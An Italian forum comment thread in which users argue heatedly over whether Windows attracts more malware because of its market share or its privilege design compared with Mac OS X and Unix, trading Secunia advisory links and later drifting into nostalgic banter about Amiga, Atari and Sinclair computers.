            tanta gente che scrive virus.

            certo che se uno non vuole arrivarci...*nix-linux e windows non hanno la stessa struttura che poggia sulla gerarchia d'utenza (e non è solo li la differenza, ci mancherebbe), quindi sostenere che si buca solo windows perché è + diffuso fa sorridere; t'ha mai sfiorato l'idea che lo si buchi perché è più facile farlo a prescindere da quanti lo usino?la sua diffusione è solo un aggravante che non fa altro che aumentare i danni di tali traforature.


            Ci sono in compenso una tonnellata di exploit,


            falle, vulnerabilità per servizi tipici dei


            sistemi unix, ftp, telnet, ssh, sendmail, ecc.


            Cos'hanno in comune questi servizi? Sono molto


            diffusi.






            hai dei dati che siano concreti, vero?

            Google ti aiuta sempre. Cerca exploit e aggiungi
            uno qualunque dei servizi unix più comuni,
            telnet, ftp, ecc.
            furbettone...quesi servizi nono sono specifici a *nixsto ancora aspettando i dati relativi alle maggiorni vulnerabilità degli *nix-linux rispetto a windows.fai un bel giretto su secunia e analizza i dati che trovi, poi torna a raccontarcela giusta


            dove l'ho scritto?

            sei tu che teorizzi sul fatto che sia solo
            merito

            della diffusione ignorando che OSX e windows non

            sono "costruiti" allo stesso

            modo.

            L'hai scritto dicendo che osx è sicuro, scrivendo
            una enorme castroneria.ripeto dove l'ho scritto?che io possa aver scritto che è più sicuro di windows è possibile che io abbia scritto che è assolutamente sicuro ti sfido a trovarlo.il resto sono speculazioni tue. Osx è bucabile come
            qualsiasi altro sistema operativo, è fatto con la
            qualità di qualsiasi altro sistema operativo
            commerciale (tralasciamo le distro linux che sono
            dei colapasta) e quindi subisce attacchi dei
            virus come qualsiasi altro sistema:dove avrei scritto il contrario?se puoi postare un link bene, altrimenti evita di svicolare attribuendo quello che capisci male tu ad altri. in base alla
            sua diffusione. La diffusione è infima, i virus
            sono pochissimi.la struttura dell'OS non garantisce sicurezza dal punto di vista della questione priviliegi d'utenza, il sistema è a rischio...che lo usi solo io o che lo usiamo tutti. La diffusione è tanta i virus
            sono tanti e tra questi tanti ce n'e' qualcuno
            particolarmente pesante.ad esempio?vuoi farmi credere, con queste farneticazioni, che windows è un groviera solo perché è diffuso e non perché è "fatto" come è fatto? Unix che ha una
            diffusione lato server comparabile con windows
            lato desktop subisce attacchi, e viene bucato, in
            continuazione: un giorno è ssh, un giorno è ftp,
            un giorno è sendmail ...
            mentre un server windows questi servizi non li usa, vero?;-)



            Direi di no visto che te ne hanno appena

            patchati


            31, cosa ci voleva per scrivere un exploit?



            dimmelo tu che sei un esperto?

            e spiegami come mai se è così facile, come mai

            non ce ne sono? delle 2 l'una, o è troppo facile

            farne o è una questione di

            diffusione...

            Io direi anche entrambe, però vedi che ci arrivi?
            io direi che continui a ignorare che i vari OS non sono strutturati allo stesso modo. ignorando questo ti rimane solo la la teoria della diffusione e la razzata del troppo facile farne, nessuno li fa




            Qualcuno che lo facesse e per la legge di
            grandi


            numeri è molto meno probabile che qualcuno lo


            faccia per osx rispetto a windows.






            nonsense.

            Argomenti a profusione eh?
            devo trovare argomenti a un nonsense?

            the more is difficult the more is fun, che
            credi?

            che nessun gruppo di hackers lavori per farne
            per

            OS X? suvvia usa google e datti una

            svegliata

            Infatti evidentemente per macosx è sia troppo
            facile che poco remunerativo.certo certo 25000 dollaruzzi di premio fanno schifo a chiunquehttp://macdailynews.com/index.php/weblog/comments/mac_os_x_virus_prize_2005_offers_25000_cash_prize/ Suvvia anche senza
            usare google datti una svegliata... e pensa ai
            motivi veri, non a quelli che vedi in tv
            (uccidere gli alieni, scoprire i segreti della
            cattiva corporation, ecc), per cui vengono creati
            i virus.
            questo invece si che è un argomento serio... ma lol


            se la tua logica matematica è questa allora

            stiamo messi molto ma molto

            male...

            Che tu sia messo molto male si vede... non hai
            uno straccio di argomento, però devo ammettere
            che si fa molta fatica a risponderti visto che
            non c'e' una logica da
            seguire.certo...infatti rispondendo ai tuoi post alogici difficile poi pretendere da chi ti risponde una certa logica.che tu non capisca o non sappia le cose, non implica che sia per forza come dici tu.dai scalda la caverna che fa freddo
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.

            certo che se uno non vuole arrivarci...*nix-linux
            e windows non hanno la stessa struttura che
            poggia sulla gerarchia d'utenza (e non è solo li
            la differenza, ci mancherebbe), quindi sostenere
            che si buca solo windows perché è + diffuso fa
            sorridere; t'ha mai sfiorato l'idea che lo si
            buchi perché è più facile farlo a prescindere da
            quanti lo
            usino?No, per il semplice fatto che unix lo bucano ogni giorno. A te ha mai sfiorato l'idea che nessuno abbia interesse a bucare un so che non usa nessuno? Eppure di esempi ne hai...
            furbettone...quesi servizi nono sono specifici a
            *nixScusa? So che sparerai una immensa vaccata in risposta a questo quindi pensa bene a quello che scrivi ...
            sto ancora aspettando i dati relativi alle
            maggiorni vulnerabilità degli *nix-linux rispetto
            a
            windows.
            fai un bel giretto su secunia e analizza i dati
            che trovi, poi torna a raccontarcela
            giustahttp://secunia.com/product/1174/http://secunia.com/product/4813/http://secunia.com/product/4669/http://secunia.com/product/213/http://secunia.com/product/138/Ti risparmio i totali.
            ripeto dove l'ho scritto?
            che io possa aver scritto che è più sicuro di
            windows è possibile che io abbia scritto che è
            assolutamente sicuro ti sfido a
            trovarlo.
            il resto sono speculazioni tue.Speculazioni mie? Beh ma visto che tu speculi sulla sicurezza non posso farlo io?
            Osx è bucabile come

            qualsiasi altro sistema operativo, è fatto con
            la

            qualità di qualsiasi altro sistema operativo

            commerciale (tralasciamo le distro linux che
            sono

            dei colapasta) e quindi subisce attacchi dei

            virus come qualsiasi altro sistema:

            dove avrei scritto il contrario?Appena sopra... hai scritto che osx è più sicuro di windows e che il fatto di non essere bucato con la stessa frequenza di windows non dipende dalla minore diffusione.
            la struttura dell'OS non garantisce sicurezza dal
            punto di vista della questione priviliegi
            d'utenza, il sistema è a rischio...che lo usi
            solo io o che lo usiamo
            tutti.E in quale film windows non gestisce privilegi? Il fatto che tu entri come administrator non significa che lo facciano tutti. Io entro in tutte le mie macchine sia in ufficio che a casa come root e administrator a seconda del so. Se installo un virus non è certo colpa del so.
            La diffusione è tanta i virus

            sono tanti e tra questi tanti ce n'e' qualcuno

            particolarmente pesante.
            ad esempio?Con una certa diffusione per linux c'e' stato morris, ramen, adore, per windows sasser. Per mac ... nessuno
            vuoi farmi credere, con queste farneticazioni,
            che windows è un groviera solo perché è diffuso e
            non perché è "fatto" come è
            fatto?Esatto. Perchè a meno che tu non mi dimostri che qualcosa nell'architettura o nel processo di testing di windows rende la vita facile agli scrittori di virus l'unica spiegazione è la diffusione.
            Unix che ha una

            diffusione lato server comparabile con windows

            lato desktop subisce attacchi, e viene bucato,
            in

            continuazione: un giorno è ssh, un giorno è ftp,

            un giorno è sendmail ...



            mentre un server windows questi servizi non li
            usa,
            vero?Secondo te il codice sorgente dei servizi è lo stesso,vero?
            io direi che continui a ignorare che i vari OS
            non sono strutturati allo stesso modo. ignorando
            questo ti rimane solo la la teoria della
            diffusione e la razzata del troppo facile farne,
            nessuno li
            faIl fatto è che non si tratta di una teoria ma di semplice logica, quella cosa che tu ti ostini a rifiutare.


            nonsense.

            Argomenti a profusione eh?
            devo trovare argomenti a un nonsense?Devi cercare il senso nella frase... a volte basta leggerla, nel tuo caso te la devi studiare un pochino.
            certo certo 25000 dollaruzzi di premio fanno
            schifo a
            chiunque
            http://macdailynews.com/index.php/weblog/comments/Cosa dovrebbe dirmi in questo link? Non si parla da nessuna parte di 25000 dollari.
            Suvvia anche senza

            usare google datti una svegliata... e pensa ai

            motivi veri, non a quelli che vedi in tv

            (uccidere gli alieni, scoprire i segreti della

            cattiva corporation, ecc), per cui vengono
            creati

            i virus.


            questo invece si che è un argomento serio... ma
            lolVisto il giro di affari che c'è dietro è sicuramente serio. Sai quanto fattura la symantec?
            dai scalda la caverna che fa freddoDa dove ti sto scrivendo io non fa certo freddo...
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: nome e guardone

            certo che se uno non vuole
            arrivarci...*nix-linux

            e windows non hanno la stessa struttura che

            poggia sulla gerarchia d'utenza (e non è solo li

            la differenza, ci mancherebbe), quindi sostenere

            che si buca solo windows perché è + diffuso fa

            sorridere; t'ha mai sfiorato l'idea che lo si

            buchi perché è più facile farlo a prescindere da

            quanti lo

            usino?

            No, per il semplice fatto che unix lo bucano ogni
            giorno.
            certo...quindi windows è il + sicuro.la logica fa paura
            A te ha mai sfiorato l'idea che nessuno abbia
            interesse a bucare un so che non usa nessuno?
            Eppure di esempi ne
            hai...
            tipo un OS usato da milioni di utenti in organizzazioni + o - grandi?dai figuracce a ripetizione...

            furbettone...quesi servizi nono sono specifici a

            *nix

            Scusa? So che sparerai una immensa vaccata in
            risposta a questo quindi pensa bene a quello che
            scrivi
            ...
            ssh, ftp non esistono in server win?

            sto ancora aspettando i dati relativi alle

            maggiorni vulnerabilità degli *nix-linux
            rispetto

            a

            windows.

            fai un bel giretto su secunia e analizza i dati

            che trovi, poi torna a raccontarcela

            giusta

            http://secunia.com/product/1174/
            http://secunia.com/product/4669/
            http://secunia.com/product/213/
            http://secunia.com/product/138/

            Ti risparmio i totali.
            risparmiateli perché quei dati non indicano che win è in assoluto + sicuro degli altri OS...e riprovaci

            ripeto dove l'ho scritto?

            che io possa aver scritto che è più sicuro di

            windows è possibile che io abbia scritto che è

            assolutamente sicuro ti sfido a

            trovarlo.

            il resto sono speculazioni tue.

            Speculazioni mie? Beh ma visto che tu speculi
            sulla sicurezza non posso farlo
            io?
            ti ho chiesto dove ho scritto quelle cose...se non puoi provarlo sono speculazioni tue.

            Osx è bucabile come


            qualsiasi altro sistema operativo, è fatto con

            la


            qualità di qualsiasi altro sistema operativo


            commerciale (tralasciamo le distro linux che

            sono


            dei colapasta) e quindi subisce attacchi dei


            virus come qualsiasi altro sistema:



            dove avrei scritto il contrario?

            Appena sopra... hai scritto che osx è più sicuro
            di windows e che il fatto di non essere bucato
            con la stessa frequenza di windows non dipende
            dalla minore
            diffusione.
            infatti ho scritto che OS X come altri OS sono più sicuri di windows...non ho scritto che sono imbucabili. se poi leggi male e capisci peggio, non dare la colpa ad altri

            la struttura dell'OS non garantisce sicurezza
            dal

            punto di vista della questione priviliegi

            d'utenza, il sistema è a rischio...che lo usi

            solo io o che lo usiamo

            tutti.

            E in quale film windows non gestisce privilegi?win 9x, win 2k win XP hanno la stessa gestioni dei privilegi di un qualsivoglia OS *nix, linux o altro?ti risparmio vista che qualcosa ha migliorato
            Il fatto che tu entri come administrator non
            significa che lo facciano tutti. Io entro in
            tutte le mie macchine sia in ufficio che a casa
            come root e administrator a seconda del so. Se
            installo un virus non è certo colpa del
            so.
            certo...peccato che root e admin in 9x non c'era gran differenza, peccato che x il consumer l'utente admin è quello di default, troppi peccato per darti retta

            La diffusione è tanta i virus


            sono tanti e tra questi tanti ce n'e' qualcuno


            particolarmente pesante.

            ad esempio?

            Con una certa diffusione per linux c'e' stato
            morris, ramen, adore, per windows sasser. Per mac
            ...
            nessuno
            ed essendo più diffuso mac di windows in talune zone geografiche, come mai niente danni su mac, danni limitati su lin e tanti danni su windows?solo colpa della diffusione eh...ma LOL

            vuoi farmi credere, con queste farneticazioni,

            che windows è un groviera solo perché è diffuso
            e

            non perché è "fatto" come è

            fatto?

            Esatto. Perchè a meno che tu non mi dimostri che
            qualcosa nell'architettura o nel processo di
            testing di windows rende la vita facile agli
            scrittori di virus l'unica spiegazione è la
            diffusione.
            certo...se non fosse bucabile, il fatto che è diffuso è irrilevante.e qui la tua teoria crolla paurosamente

            Unix che ha una


            diffusione lato server comparabile con windows


            lato desktop subisce attacchi, e viene bucato,

            in


            continuazione: un giorno è ssh, un giorno è
            ftp,


            un giorno è sendmail ...






            mentre un server windows questi servizi non li

            usa,

            vero?

            Secondo te il codice sorgente dei servizi è lo
            stesso,vero?
            secondo te il codice per win è esente da problemi perché è per win?


            io direi che continui a ignorare che i vari OS

            non sono strutturati allo stesso modo. ignorando

            questo ti rimane solo la la teoria della

            diffusione e la razzata del troppo facile farne,

            nessuno li

            fa

            Il fatto è che non si tratta di una teoria ma di
            semplice logica, quella cosa che tu ti ostini a
            rifiutare.
            certo, infatti se non fosse bucabile non si diffonderebbe nulla anche se tutti usassero win.invece non è così...colpa della diffusione di nuovo?




            nonsense.


            Argomenti a profusione eh?

            devo trovare argomenti a un nonsense?

            Devi cercare il senso nella frase... a volte
            basta leggerla, nel tuo caso te la devi studiare
            un
            pochino.
            e nel tuo caso devi imparare su cosa scrivi...il nonsense non merita perdite di tempo

            certo certo 25000 dollaruzzi di premio fanno

            schifo a

            chiunque


            http://macdailynews.com/index.php/weblog/comments/

            Cosa dovrebbe dirmi in questo link? Non si parla
            da nessuna parte di 25000
            dollari.
            hai ragione era questo...se non riesci a leggere il titolo dimmelo ehhttp://macdailynews.com/index.php/weblog/comments/mac_os_x_virus_prize_2005_offers_25000_cash_prize/

            Suvvia anche senza


            usare google datti una svegliata... e pensa ai


            motivi veri, non a quelli che vedi in tv


            (uccidere gli alieni, scoprire i segreti della


            cattiva corporation, ecc), per cui vengono

            creati


            i virus.




            questo invece si che è un argomento serio... ma

            lol

            Visto il giro di affari che c'è dietro è
            sicuramente serio. Sai quanto fattura la
            symantec?

            dimmelo tu...voglio i dati oggettivi e soggettivi di bilancio e conto economico

            dai scalda la caverna che fa freddo

            Da dove ti sto scrivendo io non fa certo freddo...tira l'acqua allora
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.


            No, per il semplice fatto che unix lo bucano
            ogni

            giorno.
            certo...quindi windows è il + sicuro.Tanto per usare frasi che riesci a capire, dove l'avrei scritto che windows è più sicuro? Metti il link?

            A te ha mai sfiorato l'idea che nessuno abbia

            interesse a bucare un so che non usa nessuno?

            Eppure di esempi ne

            hai...
            tipo un OS usato da milioni di utenti in
            organizzazioni + o -
            grandi?Esatto tipo quello.

            dai figuracce a ripetizione...Si ma non sembri curartene...
            ssh, ftp non esistono in server win?Ecco lo sapevo che sparavi la vaccata. Secondo te si buca il servizio FTP, non l'implementazione di berkeley o di microsoft...

            http://secunia.com/product/1174/

            http://secunia.com/product/4669/

            http://secunia.com/product/213/

            http://secunia.com/product/138/



            Ti risparmio i totali.



            risparmiateli perché quei dati non indicano che
            win è in assoluto + sicuro degli altri OS...e
            riprovaciMa hai studiato per riuscire a dare queste risposte o ti viene naturale? E comunque sempre per usare termini a te cari mi riporti dove ho scritto che windows è il più sicuro di tutti? Ma poi vorrei una tua interpretazione di quei numeri (li hai letti no)? Cosa significa, ad esempio, che redhat ha avuto oltre 300 advisories?
            ti ho chiesto dove ho scritto quelle cose...se
            non puoi provarlo sono speculazioni
            tue.Vedi sopra.

            infatti ho scritto che OS X come altri OS sono
            più sicuri di windows...non ho scritto che sono
            imbucabili.E in base a quali considerazioni, in base a quali dati?

            E in quale film windows non gestisce privilegi?

            win 9x, win 2k win XP hanno la stessa gestioni
            dei privilegi di un qualsivoglia OS *nix, linux o
            altro?No, ma chi ti dice che quella di unix sia migliore?
            ti risparmio vista che qualcosa ha miglioratoOvvero? Cosa c'e' di così nuovo nella gestione degli utenti di vista ... mi fa piacere sentire il parere dell'esperto.

            certo...peccato che root e admin in 9x non c'era
            gran differenza, peccato che x il consumer
            l'utente admin è quello di default, troppi
            peccato per darti
            rettaParliamo di 10 anni fa, quando il macos non era nemmeno multitasking... ma non devo essere io a ricordartelo vero?
            ed essendo più diffuso mac di windows in talune
            zone geografiche, come mai niente danni su mac,
            danni limitati su lin e tanti danni su
            windows?
            solo colpa della diffusione eh...In quali zone geografiche il mac è più diffuso di windows? ora dimmi il Giappone, ti prego ...

            Esatto. Perchè a meno che tu non mi dimostri che

            qualcosa nell'architettura o nel processo di

            testing di windows rende la vita facile agli

            scrittori di virus l'unica spiegazione è la

            diffusione.
            certo...se non fosse bucabile, il fatto che è
            diffuso è
            irrilevante.
            e qui la tua teoria crolla paurosamenteMa tu hai ammesso che nessun sistema è esente da problemi di sicurezza. Del resto te ne hanno appena patchati 31 su mac.Ma il bello è che secondo la tua teoria, come giustamente ti hanno fatto notare in un altro post: se io mi scrivessi un sistema operativo stra-buggato (chesso tipo linux) e lo usassimo io e mia nonna dopo un instante dovrebbero esserci centinaia di exploit.

            Secondo te il codice sorgente dei servizi è lo

            stesso,vero?
            secondo te il codice per win è esente da problemi
            perché è per
            win?No. Ma i server windows sono molto meno diffusi di quelli unix...
            certo, infatti se non fosse bucabile non si
            diffonderebbe nulla anche se tutti usassero
            win.
            invece non è così...colpa della diffusione di
            nuovo?Mi trovi dove ho scritto che windows non è bucabile?
            e nel tuo caso devi imparare su cosa scrivi...il
            nonsense non merita perdite di
            tempoMa fai come me, io leggo i tuoi e mi diverto, potrei mettermi a scrivere un virus nel frattempo invece è molto più divertente leggere i tuoi post.
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: nome e guardone


            No, per il semplice fatto che unix lo bucano

            ogni


            giorno.

            certo...quindi windows è il + sicuro.

            Tanto per usare frasi che riesci a capire, dove
            l'avrei scritto che windows è più sicuro? Metti
            il link?
            nel post poco sopra dove avevi indicato link su link per dimostrarci che windows è meno bucato di *nix varici rirpovi cazzaro?



            A te ha mai sfiorato l'idea che nessuno abbia


            interesse a bucare un so che non usa nessuno?


            Eppure di esempi ne


            hai...

            tipo un OS usato da milioni di utenti in

            organizzazioni + o -

            grandi?

            Esatto tipo quello.
            ah ok banche dati che non girano su windows o PC che usano altri sistemi che win...dillo subito che parlavamo d'altro



            dai figuracce a ripetizione...

            Si ma non sembri curartene...
            infatti le si colleziona ormai

            ssh, ftp non esistono in server win?

            Ecco lo sapevo che sparavi la vaccata. Secondo te
            si buca il servizio FTP, non l'implementazione di
            berkeley o di microsoft...
            certo certo....



            http://secunia.com/product/1174/


            http://secunia.com/product/4669/


            http://secunia.com/product/213/


            http://secunia.com/product/138/





            Ti risparmio i totali.






            risparmiateli perché quei dati non indicano che

            win è in assoluto + sicuro degli altri OS...e

            riprovaci

            Ma hai studiato per riuscire a dare queste
            risposte o ti viene naturale? E comunque sempre
            per usare termini a te cari mi riporti dove ho
            scritto che windows è il più sicuro di tutti? Ma
            poi vorrei una tua interpretazione di quei numeri
            (li hai letti no)? Cosa significa, ad esempio,
            che redhat ha avuto oltre 300
            advisories?
            illuminami forza dicci cosa significa cazzaro, visto che tu le sai tutte e gli altri no

            ti ho chiesto dove ho scritto quelle cose...se

            non puoi provarlo sono speculazioni

            tue.

            Vedi sopra.
            e via di svicolata



            infatti ho scritto che OS X come altri OS sono

            più sicuri di windows...non ho scritto che sono

            imbucabili.

            E in base a quali considerazioni, in base a quali
            dati?
            a quelli che già ieri erano postati nei 3ad delle falle stuccate....rileggiti un paio di post di "logicamente"...poi capiscili e magari ritorna



            E in quale film windows non gestisce
            privilegi?



            win 9x, win 2k win XP hanno la stessa gestioni

            dei privilegi di un qualsivoglia OS *nix, linux
            o

            altro?

            No, ma chi ti dice che quella di unix sia
            migliore?
            e chi ti dice che quella di windows è migliore?suvvia basta razzate


            ti risparmio vista che qualcosa ha migliorato

            Ovvero? Cosa c'e' di così nuovo nella gestione
            degli utenti di vista ... mi fa piacere sentire
            il parere dell'esperto.

            dovresti saperlo e non attenderti la risposta da me, no?tu le sai tutte.



            certo...peccato che root e admin in 9x non c'era

            gran differenza, peccato che x il consumer

            l'utente admin è quello di default, troppi

            peccato per darti

            retta

            Parliamo di 10 anni fa, quando il macos non era
            nemmeno multitasking... ma non devo essere io a
            ricordartelo vero?
            era multitasking cooperativo gnurant....poco utile ma sempre multitasking èche cazzaro



            ed essendo più diffuso mac di windows in talune

            zone geografiche, come mai niente danni su mac,

            danni limitati su lin e tanti danni su

            windows?

            solo colpa della diffusione eh...

            In quali zone geografiche il mac è più diffuso di
            windows? ora dimmi il Giappone, ti prego ...
            se ti dico Giappone vai su asilo.it a postare?



            Esatto. Perchè a meno che tu non mi dimostri
            che


            qualcosa nell'architettura o nel processo di


            testing di windows rende la vita facile agli


            scrittori di virus l'unica spiegazione è la


            diffusione.

            certo...se non fosse bucabile, il fatto che è

            diffuso è

            irrilevante.

            e qui la tua teoria crolla paurosamente

            Ma tu hai ammesso che nessun sistema è esente da
            problemi di sicurezza. Del resto te ne hanno
            appena patchati 31 su
            mac.
            quid?rimane che se fosse vero che è la diffusione l'origine della bucabilità di un OS, se per assurdo win fosse imbucabile cade la tua teoria.e la tua teoria cade comunque anche se windows è bucabile....torna in caverna troll
            Ma il bello è che secondo la tua teoria, come
            giustamente ti hanno fatto notare in un altro
            post: se io mi scrivessi un sistema operativo
            stra-buggato (chesso tipo linux) e lo usassimo io
            e mia nonna dopo un instante dovrebbero esserci
            centinaia di exploit.
            e giustamente questo ragionamento puffoso si basa sulla diffusione che non è all'origine delle falle degli OS.dato che le falle sono nell'OS e l'OS è un produttore che lo fa, la diffusione aiuta solo a diffornderne i danni.che poi tu confonda il fatto che la diffusione permetta a più gente di provare a scrivere virus per win con il fatto che l'OS ha delle falle indipendentemente che siano 1 o 1milioni di persone ad usarlo o a trovarle...se fai confusione non è colpa di altri



            Secondo te il codice sorgente dei servizi è lo


            stesso,vero?

            secondo te il codice per win è esente da
            problemi

            perché è per

            win?

            No. Ma i server windows sono molto meno diffusi
            di quelli unix...

            e come mai si bucano altrettanto come gli altri malgrado la diffusione?


            certo, infatti se non fosse bucabile non si

            diffonderebbe nulla anche se tutti usassero

            win.

            invece non è così...colpa della diffusione di

            nuovo?

            Mi trovi dove ho scritto che windows non è
            bucabile?
            ho scritto che lo hai scritto tu?c'era un "se" cazzaro gnurante


            e nel tuo caso devi imparare su cosa scrivi...il

            nonsense non merita perdite di

            tempo

            Ma fai come me, io leggo i tuoi e mi diverto,
            potrei mettermi a scrivere un virus nel frattempo
            invece è molto più divertente leggere i tuoi
            post.certo è da stamattina che attendiamo gli esiti di quella"passeggiata"dai cazzaro che carnevale arriva preso
          • HeroProtagonist scrive:
            Re: MAC OS X più vulnerabile di Windows.

            Google ti aiuta sempre. Cerca exploit e aggiungi
            uno qualunque dei servizi unix più comuni,
            telnet, ftp, ecc.Telnet, ftp, ecc... sono protocolli che erano vecchi prima ancora che mettessi le mani sul mio primo M24.Anche l'utente piú sprovveduto ha ormai imparato adusare SSH invece di telnet e SFTP invece che FTP.... mai sentito parlare di tunnel SSH? Visto poi che sai usare usare Google (meraviglia) usalo come si deve: http://code.google.com/p/macfuse/
          • nome e guardone scrive:
            Re: MAC OS X più vulnerabile di Windows.
            .
            Anche l'utente piú sprovveduto ha ormai imparato
            adusare SSH invece di telnet e SFTP invece che
            FTP.... mai sentito parlare di tunnel SSH?Io si, tu? http://secunia.com/advisories/22173/http://secunia.com/advisories/9825/http://secunia.com/advisories/9743/
            Visto poi che sai usare usare Google (meraviglia)
            usalo come si deve:
            http://code.google.com/p/macfuse/E quindi?
          • AcidoPerMel a scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: PLONK_THIS
            ..........
            ottimo argomento, peccato che la tua teoria sulla
            diffusione fa acqua appunto perché windows,
            linux, *nix sono sono "fatti" allo stesso
            modo.Ma che caxxo dici???? Windows ha avuto kernal completamente differenti ( uno basato su codice digital e uno su codice 16 bit), ma virus che agivano su entrambe le piattaforme usando il comune activex o altro.Linux ha kernal completamente avulso e le compatibilità fra kernal di BSD e attuali linux non è certo elevato.E i virus/trojan ect non lavorano certo a questi livelli, ma attaccano singoli software.



            Ci sono in compenso una tonnellata di exploit,

            falle, vulnerabilità per servizi tipici dei

            sistemi unix, ftp, telnet, ssh, sendmail, ecc.

            Cos'hanno in comune questi servizi? Sono molto

            diffusi.Ha perfettamente ragione.



            hai dei dati che siano concreti, vero?Basta cercarli in internet. Qualunque utonto non prevenuto li trova.



            Tu hai prove per dire che os x immune da bug?

            dove l'ho scritto?
            sei tu che teorizzi sul fatto che sia solo merito
            della diffusione ignorando che OSX e windows non
            sono "costruiti" allo stesso
            modo.Che fai, contraddici quello che hai appena detto?


            ...

            se la tua logica matematica è questa allora
            stiamo messi molto ma molto
            male...Neanche la tua è granchè ....
          • PLONK_THIS scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: AcidoPerMel a
            - Scritto da: PLONK_THIS

            ..........

            ottimo argomento, peccato che la tua teoria
            sulla

            diffusione fa acqua appunto perché windows,

            linux, *nix sono sono "fatti" allo stesso

            modo.

            Ma che caxxo dici???? Windows ha avuto kernal
            completamente differenti ( uno basato su codice
            digital e uno su codice 16 bit), ma virus che
            agivano su entrambe le piattaforme usando il
            comune activex o
            altro.
            ma cosa c'entra il kernel differente se non hai gerarchie d'utenza con privilegi ben delimitati...fino ad XP tutti giravano con account admin di default...quell'account permette di fare + danni dell'account admin di linux/*nix
            Linux ha kernal completamente avulso e le
            compatibilità fra kernal di BSD e attuali linux
            non è certo
            elevato.ho scritto che i kernel sono uguali?se si indicami dove.
            E i virus/trojan ect non lavorano certo a questi
            livelli, ma attaccano singoli
            software.
            poi mi spieghi allora come mai per rendere più sicuro vista c'è l'UAC di default eh






            Ci sono in compenso una tonnellata di exploit,


            falle, vulnerabilità per servizi tipici dei


            sistemi unix, ftp, telnet, ssh, sendmail, ecc.


            Cos'hanno in comune questi servizi? Sono molto


            diffusi.

            Ha perfettamente ragione.
            certo, in base a quale teoria fantozziana dovrebbe essere assolutamente e solo vero che windows è bucabile SOLO perché diffuso?






            hai dei dati che siano concreti, vero?

            Basta cercarli in internet. Qualunque utonto non
            prevenuto li
            trova.
            illuminami....e mi aspetto anche un link che ti possa aiutare nella giustificazione "windows bucabile solo perché diffuso"






            Tu hai prove per dire che os x immune da bug?



            dove l'ho scritto?

            sei tu che teorizzi sul fatto che sia solo
            merito

            della diffusione ignorando che OSX e windows non

            sono "costruiti" allo stesso

            modo.

            Che fai, contraddici quello che hai appena detto?
            dove ho scritto che OS X è immune da bug?trovami le mie parole nero su bianco




            ...



            se la tua logica matematica è questa allora

            stiamo messi molto ma molto

            male...

            Neanche la tua è granchè ....detto da te....fa tanta tenerezza
          • Mythos scrive:
            Re: MAC OS X più vulnerabile di Windows.
            Il tuo è un classico caso di invidia del pene.Secondo la tua logica dovremmo tutti passare a macchine Windows based solo perché altrimenti ci si ritrova esclusi dal fortunatissima elite di utenti che può vantare di avere un sistema operativo a diffusione mondiale, con il valore aggiunto di essere vittima di qualche malware.Insomma, essere preda di un worm sarebbe un pregio.Sopraffino.
          • Pel scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: Mythos
            Il tuo è un classico caso di invidia del pene.
            Ma no, è un semplice caso di incompetenza totale. Quasi certamente Nome e Guardone non ha mai scritto codice, non è mai stato a Redmond, né a Cupertino, e non ha idea di cosa voglia dire "qualità del software". Inoltre, non sa come è fatto un sistema operativo (dentro voglio dire...) quindi non si rende conto dei differenti approcci alla gestione di utenti e permessi fra piattaforme *nix e Win. In più, non sa leggere i dati di Secunia (ahem, qui però bisogna dargli atto che Secunia pubblica apposta in forma piuttosto criptica, chi è del ramo sa anche perché) e, a occhio e croce, ho l'impressione che non conosca la differenza fra "vulnerability" ed "exploit".Insomma, un disastro su tutta la linea. Ma devo dire che la cieca ottusità dei suoi post ci ha tenuti allegri per una mezz'oretta in laboratorio, il che di questi tempi è un atto oltremodo meritorio, di cui lo ringraziamo...
          • anonimo01 scrive:
            Re: MAC OS X più vulnerabile di Windows.

            Esistevano virus per Amiga (con il grandissimo
            share che aveva(rotfl) prima di sparire dalla
            faccia della terra O))
            :s non capisco cosa ci sia da ridere...cos'è, avevi il gommoso atari per caso?(allora mi sa che le risate me le faccio io)(amiga)(amiga)(apple)(linux)
          • AcidoPerMel a scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: anonimo01

            Esistevano virus per Amiga (con il grandissimo

            share che aveva(rotfl) prima di sparire dalla

            faccia della terra O))



            :s non capisco cosa ci sia da ridere...cos'è,
            avevi il gommoso atari per
            caso?
            (allora mi sa che le risate me le faccio io)

            (amiga)(amiga)(apple)(linux)naaa ... era uno degli invidiosi che avevano quella cosa ... il sinclair.
          • HeroProtagonist scrive:
            Re: MAC OS X più vulnerabile di Windows.
            cosa c'é contro il sinclair? io ci gioco ancora a Galaga e space invaders... con il tv al plasma é semplicemente grandioso!
          • MeX scrive:
            Re: MAC OS X più vulnerabile di Windows.
            ma non hai paura a vedere pixel di 20x20 cm ? :D
          • HeroProtagonist scrive:
            Re: MAC OS X più vulnerabile di Windows.
            é proprio quelo il bello... quel gusto vintage che ti fa sentire ancora il profumo dei verdi anni...
          • MeX scrive:
            Re: MAC OS X più vulnerabile di Windows.
            ih ih ih :)
          • AtariLover scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: anonimo01

            Esistevano virus per Amiga (con il grandissimo

            share che aveva(rotfl) prima di sparire dalla

            faccia della terra O))



            :s non capisco cosa ci sia da ridere...cos'è,
            avevi il gommoso atari per
            caso?
            (allora mi sa che le risate me le faccio io)

            (amiga)(amiga)(apple)(linux)Scusa cosa avresti da dire contro l'Atari???(rotfl)(atari)
          • anonimo01 scrive:
            Re: MAC OS X più vulnerabile di Windows.


            :s non capisco cosa ci sia da ridere...cos'è,

            avevi il gommoso atari per

            caso?

            (allora mi sa che le risate me le faccio io)



            (amiga)(amiga)(apple)(linux)

            Scusa cosa avresti da dire contro l'Atari???

            (rotfl)

            (atari)ad oggi, nulla.anzi, mi piacerebbe da morire esistesse ancora qualcosa di quell'epoca...il mio commento era solo un po' di retro-flamewar ;)(amiga)(c64)
          • AtariLover scrive:
            Re: MAC OS X più vulnerabile di Windows.
            - Scritto da: anonimo01

            ad oggi, nulla.
            anzi, mi piacerebbe da morire esistesse ancora
            qualcosa di
            quell'epoca...

            il mio commento era solo un po' di retro-flamewar

            ;)

